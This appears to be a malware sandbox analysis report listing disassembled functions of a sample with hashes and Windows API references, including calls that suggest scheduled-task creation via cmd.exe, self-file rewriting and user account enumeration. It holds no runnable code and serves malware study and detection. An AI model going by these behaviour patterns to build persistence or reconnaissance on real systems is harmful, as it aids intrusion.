Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
Instruction ID: 4c2327c6d9ea0fd5f78b0127e51354d19f4113b4e822ec877585a6efb92c7c58
Opcode Fuzzy Hash: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
Instruction Fuzzy Hash: CD62BC70E00A269BEB0CCF55C4906EDBBB2FF85311F24826EC81667B85D778A955CF84

Function 00433980 Relevance: .7, Instructions: 675COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
Instruction ID: 31199357ceec466129956888dd439b1d4a6f100edec160316ecfa63dcdc1427f
Opcode Fuzzy Hash: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
Instruction Fuzzy Hash: 1B42D371A002199FDB10DFA9C881AEFB7B1BF88304F54556EE446A7342D738BD45CBA8

Function 00443BB0 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
Instruction ID: eac5d11cb92673f9bb66abbec7de51b37a046753e49d1a185180b8ac7a31a903
Opcode Fuzzy Hash: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
Instruction Fuzzy Hash: 7D122630A047859FEB25CF18C9806AEB7F1AF96710F14855FE4A68B391C738EE46CB54

Function 00444280 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
Instruction ID: 021bb5d2b7c0cb56e537b8d227e73ed21d0ebdb26bc59c524461a715ef61eba8
Opcode Fuzzy Hash: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
Instruction Fuzzy Hash: FC12F630A047849FEB15CF28C9807AEBBF1AF96314F14855EE8A64B791C738ED42CB54

Function 004434E0 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
Instruction ID: c4f7584d98bb462e22f8ca5efa45b381d380756b5cf0509a019ae382a9018600
Opcode Fuzzy Hash: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
Instruction Fuzzy Hash: B1121570A007859FEB25CF18C9806AEBBF1AF96711F14855FE4A68B351C738EE42CB54

Function 00442250 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
Instruction ID: b7b9f9f22af13d42a5b6316f7f2a44174fcb43b43f91c23f0d1d097708033df0
Opcode Fuzzy Hash: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
Instruction Fuzzy Hash: F312E530A047859FEB25CF28CA8069A7BF1BF56310F54855EF8A58B381C778ED42CB64

Function 00440A60 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
Instruction ID: c96630ca6486ca8a3dffba479f0708cf21e85e20dbdd268f71493559b7ccfc47
Opcode Fuzzy Hash: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
Instruction Fuzzy Hash: 91021630A007459FEB24CF18C9806AFB7E1EF91314F14856FE9A68B391D738AD56C798

Function 0043FE00 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
Instruction ID: b5c27d84d61b241dfbbeb53c51d0fdd6cf76b480a9746a7cf7f6d71d37627bea
Opcode Fuzzy Hash: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
Instruction Fuzzy Hash: 1702F330A007459FEB20CF28C9816AF77E1BF96310F14856FE9A58B391D738AD56CB94

Function 004416C0 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
Instruction ID: 5c11e9432c662da9e832bb00048f610cc01de9b2e0be984bbf0aa46c625adfee
Opcode Fuzzy Hash: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
Instruction Fuzzy Hash: BE02E630A007459FEB24CF18C9916AFB7E1EF92310F14855FE4A69B3A1D738A982C759

Function 0043F190 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
Instruction ID: 6f27e782664b546ea9a7b70d93e541e4de47497114ddd59825f0d455be94bf6b
Opcode Fuzzy Hash: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
Instruction Fuzzy Hash: AE02F430E007459FDB24CF28C581AAF77E1AF99310F14956FE8A58B391D738AD4ACB94

Function 00408FB0 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
Instruction ID: e4885def972384e71c6d3d4fa2c3ca7822b4fe2f95aa3e637cc98f64f0d57cdc
Opcode Fuzzy Hash: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
Instruction Fuzzy Hash: 93F19B71A0021AABDB20CF98C984BAFB7B5EF88314F14417AED05A7381D779DD41CBA5

Function 004386F0 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
Instruction ID: fb58a9955cc4d1b946931b1175dba42f0bbce99fa4b1ebf213060499804b6f98
Opcode Fuzzy Hash: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
Instruction Fuzzy Hash: 991236B1E002198FCF18CF99C9905ADFBF2BF98314F18916EE849AB754D738A941CB54

Function 0043E340 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
Instruction ID: f84bb95602b786eda625d293fa24169cae21de97630f021d2562301d3a5a23f9
Opcode Fuzzy Hash: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
Instruction Fuzzy Hash: 58E18A309067859FDB25CF2AC8816BE7BE1AF6A314F14816FD4E54B3C1C638AD46CB48

Function 00448360 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
Instruction ID: d50c75c3876421525f344fdd73dc0d94e20a485c8d9004176434aa332c09f1d1
Opcode Fuzzy Hash: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
Instruction Fuzzy Hash: 13E1F530A045558FDB08CF68C8806ADBBF2EF85314B29C1AED895DB346DA39DA46CB54

Function 00439B90 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
Instruction ID: 225706b8245442841e5fafbb32bd6a2fabd71da86d83268e1d7ace3ee5cdc439
Opcode Fuzzy Hash: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
Instruction Fuzzy Hash: 5FD12572E0021A8FCB18CF99C9815AEFBF2FF98310F24952AD855AB744D774AD01CB94

Function 00406B60 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8

Function 0044BFE3 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: b8886794a6e5007edff55ecb8f40356a68830081a2fd7a3c661494ca94f11cdd
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 1581C5319893918BC795DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51

Function 0043A6D0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
Instruction ID: 74367e3e6ab0b74d7f5c1cf3bcaa0d89af6e6a6e1ec9fa16ff19e2e679a1abb2
Opcode Fuzzy Hash: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
Instruction Fuzzy Hash: 5551C633F219214BF348CA79CC8415A73D3EBCE31071AC27AD901D7295E974E96396C5

Function 0040DDA0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
Instruction ID: 6b590965bade377d4829cb5edd661b89940232f3d33fb21e100e917a0d425a21
Opcode Fuzzy Hash: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
Instruction Fuzzy Hash: F6518E7190D3928BD311CF29C48066BFBE1AFD9314F048A6EF8C4A7351D7788A49CB96

Function 0043A4F0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
Instruction ID: e5d6b1d35e3d87a4e74f21fc64f62253c0a3e01d769b06703654ef7c4b1d687f
Opcode Fuzzy Hash: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
Instruction Fuzzy Hash: F941C377E51A3947F3188949CD81754AA52ABCC324F2B83B5CD2C6B316D8B9ED039AD0

Function 0040DFC0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
Instruction ID: d8d0adafabcbd5d708f1da50a49402fb3bf4ae1d939e6727f3124d8f61b49aed
Opcode Fuzzy Hash: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
Instruction Fuzzy Hash: ED51A17150C3A18BD315CF2AC48066BBBE1BBC9314F048E6EE8D497351D778DA09CB96

Function 0042CF60 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
Instruction ID: c0d06c3b42bc6b51c97fcab68d65b60e5fd230549ea87696981b9f88f0129265
Opcode Fuzzy Hash: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
Instruction Fuzzy Hash: 00214F339748B601E7504B718D586227BD2CFCB206FAF81B5D644C7992D63ED4029564

Function 0040DA50 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
Instruction ID: 83a3f7d0e66a37bb7e6fdedb80276840f88715c9868f56da058082779efa7e5d
Opcode Fuzzy Hash: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
Instruction Fuzzy Hash: 2101C92BB7CE0E45C51940AC1424A6A11801B127657D4063BAAC7F83D5EFEDD86FD84F

Function 00412FF0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
Instruction ID: b04785f1e362cafcd50622ec6ea8703a75b25b73c25fc77f3c2a0d59776fd131
Opcode Fuzzy Hash: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
Instruction Fuzzy Hash: 2B01F7B19053189FEB20CF94DD8579BBBF4FB01305F40809DE98D93240C3755644CB96

Function 00406800 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40

Function 00403579 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
memset.MSVCRT ref: 00403616
_snwprintf.MSVCRT ref: 00403630
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
wcsstr.MSVCRT ref: 004036F2
wcsstr.MSVCRT ref: 00403725
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
SetEndOfFile.KERNEL32(00000000), ref: 004037F3
CloseHandle.KERNEL32(00000000), ref: 004037FA
VariantInit.OLEAUT32(00000000), ref: 0040382B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0

Strings

00-->, xrefs: 0040371F
p=Dv, xrefs: 0040382B
<Actions , xrefs: 004036EA

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=Dv
API String ID: 3028510665-2653830224
Opcode ID: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
Instruction ID: 60e659956de6826fb5c9e3504b81639812d481b549725b71a5a6ffd7b5f9c5d4
Opcode Fuzzy Hash: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
Instruction Fuzzy Hash: CBA1CEB2504311ABC720DF64CC48F5B7BA8EFC8751F048669FA45EB291D774EA04CBA8

Function 00402F30 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?,76D6DB30), ref: 00402F40
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
VariantInit.OLEAUT32(?), ref: 00402F9F
VariantInit.OLEAUT32(?), ref: 00402FBA
VariantInit.OLEAUT32(?), ref: 00402FD8
VariantInit.OLEAUT32(?), ref: 00402FF6
VariantClear.OLEAUT32(?), ref: 0040307C
CreateFileMappingW.KERNELBASE(?), ref: 00403082
VariantClear.OLEAUT32(?), ref: 00403088
VariantClear.OLEAUT32(?), ref: 0040308E
InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
SysAllocString.OLEAUT32(00404EEC), ref: 00403276
VariantInit.OLEAUT32(?), ref: 0040329B
VariantInit.OLEAUT32(?), ref: 004032B9

Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80

VariantClear.OLEAUT32(?), ref: 00403366
VariantClear.OLEAUT32(?), ref: 0040336C
VariantClear.OLEAUT32(?), ref: 00403372

Strings

p=Dv, xrefs: 00402F95, 00403282
cmd.exe, xrefs: 004031D1

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
String ID: cmd.exe$p=Dv
API String ID: 3029307448-1819144570
Opcode ID: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
Instruction ID: 9e23888bed06d8ec6237e29dc82f696ab5e76098d001fcea0e973b2596c5eb93
Opcode Fuzzy Hash: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
Instruction Fuzzy Hash: 64F10875E002199FCB00DFA8C884A9EBBB9FF88710F1581AAE914BB351D774AD01CF94

Function 00401D80 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76D6DB30), ref: 00401DA6
NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76D6DB30), ref: 00401DC2
_snprintf.MSVCRT ref: 00401E08
NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
NetApiBufferFree.NETAPI32(?), ref: 00401E3A
NetApiBufferFree.NETAPI32(?), ref: 00401E45

Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
